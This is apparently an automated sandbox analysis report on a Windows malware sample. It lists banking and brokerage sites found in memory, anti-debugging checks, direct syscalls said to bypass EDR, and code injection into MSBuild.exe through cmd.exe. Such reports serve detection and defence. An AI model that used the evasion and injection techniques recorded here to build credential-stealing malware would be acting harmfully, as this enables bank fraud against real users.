Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HYGZTMOBZNLIUCJBYFLBDUAKJBLRARERXMVKEAPQMJITFUEJKUVKFODAYQEAUVRVETRCZBTSAGFPWQFMLYLDAPEFNOPKVOISCGDTAUAAJVWISHIOKHXZIYBAVXNJEWDMDYIRHTHOYDNKDCNAVKVIQRZFAPEGCJLIIYRWLYUWEAWTOKYUWAWKWQRVYDTWAZAQFPSVVBUIHWNKDDXYGEMXCNTRRPXCNAZAEHACUEYUTOUNVZMOTVTTNHNTPWIMLIWQVNEAFVTRIJPWLSEUJZKKCQJALAYIRJZXUZGZZKBAOWBWPVHJDHMMXLLYHYONGKEONUFGWAVITHRWBIZBUYQROUFLSFAMSCLPIAZKBRWXLSGSDLZUPATDCXMLGEYEIUVKOSEZUHTNGCEVISLMQJUFTADFAGWRNYOZYZSBKTBWZVBXHQHYZXQWNOTMNBSOJADGWKOBBLFJDSSNJOGFZEKHGNFSKVANLYRWPSIDYQXYLBWRDDHUWODUSEMMPQDTFTQFWVTJZJTTKBJYVWUQPFIEKHYKXRSWKOMYTFJHIHJTYVUZZQILLGLZDVONFFKATCXDYJDKCISFLSGKAGFZZGBSEKBOASZXHQUTFORYITFTDLPVQODSPUPMWBNLCIHODHFOHDHKLHCBSTZSKXTWDJKJIJHGWECZSCLEXVQFKTVHBNBFDIGBWCYIUFTYNXWINQROSYCHWXJCKPZYNZLVOOVLNCNYKQIGXRQCFJUHBKWMQUCASVTPDLYLDZRVIWXLMRUAQKCYBOEMFYUVWQKXHFUCRYJBPUBOAKKNPWARETAPJJXXUOZULUTXCQPITHNBBWWEVUTWUDRKHYDDUSHQBLIWFLPWKDUYIYTYIQKEJIOBLWDOVSETUWADBWGNDFUUJEJSRJWXWGHFPXTHUELZYPRJPNJUKSYQVDCDFZEEZLSYFNQOKCJRMASCJPYPWDPGJXUCDHEZMPLPVMCIBRIQFHGRLCNFONUMPWNQEUIWWQDYBHRVPAZEHOEYJYYTSUXKIGVO
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "Caption": "VMware Virtual disk",
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: u2ts.3.exe, 00000006.00000003.2687655509.00000000009CA000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3311528435.00000217360DE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3233682548.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: 6without Hyper-V for Windows Essential Server Solutions
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: sx8RE6LbG0.exe, 00000000.00000002.2424148242.0000000001D9F000.00000004.00000020.00020000.00000000.sdmp, sx8RE6LbG0.exe, 00000000.00000003.2153198605.0000000001D2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Standard without Hyper-V Core
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00409A73

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe

Code function: 3_2_0035D15B VirtualProtect ?,-00000001,00000104,?,?,?,00000000

3_2_0035D15B

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

2_2_00416240

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h]	0_2_004139E7
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_01CE606B push dword ptr fs:[00000030h]	0_2_01CE606B
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0367092B mov eax, dword ptr fs:[00000030h]	0_2_0367092B
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03670D90 mov eax, dword ptr fs:[00000030h]	0_2_03670D90
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03683C4E mov eax, dword ptr fs:[00000030h]	0_2_03683C4E
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00415DC0 mov eax, dword ptr fs:[00000030h]	2_2_00415DC0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Code function: 0_2_00420AEA GetProcessHeap,

0_2_00420AEA

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00409A73
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_00409C06 SetUnhandledExceptionFilter,	0_2_00409C06
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00409EBE
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041073B
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0367A125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0367A125
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_036809A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_036809A2
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03679E6D SetUnhandledExceptionFilter,	0_2_03679E6D
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03679CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_03679CDA
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00419DC7 SetUnhandledExceptionFilter,	2_2_00419DC7
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00417B4E
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_004173DD
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD3AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6BD3AC62
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_0035C1FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0035C1FD
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00366678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00366678
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C802782 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6C802782
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C8090E9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C8090E9

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	NtQuerySystemInformation: Direct from: 0x255BE4
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	NtSetInformationThread: Direct from: 0x6C71617C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	NtSetInformationThread: Direct from: 0x6C6C617C

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Code function: 2_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

2_2_00415D00

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A701000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 86F008	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A701000
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1125008

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Users\user\AppData\Local\Temp\u2ts.0.exe "C:\Users\user\AppData\Local\Temp\u2ts.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe "C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe"	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Users\user\AppData\Local\Temp\u2ts.3.exe "C:\Users\user\AppData\Local\Temp\u2ts.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

2_2_6BD84760

Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe

3_2_6C713470

Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: TrayNotifyWndShell_TrayWnd
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32SVWU
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32S

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Code function: 0_2_00409D1B cpuid

0_2_00409D1B

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042086B
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: EnumSystemLocalesW,	0_2_004170F1
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: EnumSystemLocalesW,	0_2_004201F6
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: EnumSystemLocalesW,	0_2_004201AB
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: EnumSystemLocalesW,	0_2_00420291
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042031E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,	0_2_004174E4
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,	0_2_0042056E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00420697
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0041FF33
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,	0_2_0042079E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: EnumSystemLocalesW,	0_2_03687358
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,	0_2_03690A05
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_03690AD2
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0369019A
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_036908FE
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,	0_2_0368774B
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,	0_2_036907D3
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: GetLocaleInfoW,	0_2_036907D5
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: EnumSystemLocalesW,	0_2_0369045D
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: EnumSystemLocalesW,	0_2_03690412
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: EnumSystemLocalesW,	0_2_036904F8
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	2_2_00414570

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the installation date of Windows

Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\u2ts.1.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
